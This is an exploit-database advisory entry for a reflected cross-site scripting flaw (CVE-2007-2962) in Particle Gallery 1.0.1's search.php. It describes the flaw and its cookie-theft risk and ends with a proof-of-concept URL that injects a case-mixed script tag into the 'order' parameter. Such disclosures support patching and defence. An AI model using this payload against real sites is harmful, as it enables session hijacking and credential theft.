[] NeoSense

Particle Gallery 1.0 - 'search.php' Cross-Site Scripting

Author: Serapis.net
type: webapps
platform: php
port: 
date_added: 2007-05-30 
date_updated: 2013-12-08 
verified: 1 
codes: CVE-2007-2962;OSVDB-36414 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/24236/info

Particle Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue affects Particle Gallery 1.0.1 and prior versions.

http://www.example.com/apppath/search.php?user=admin&order=>"><ScRiPt%20%0a%0d>alert(1111110)%3B</ScRiPt>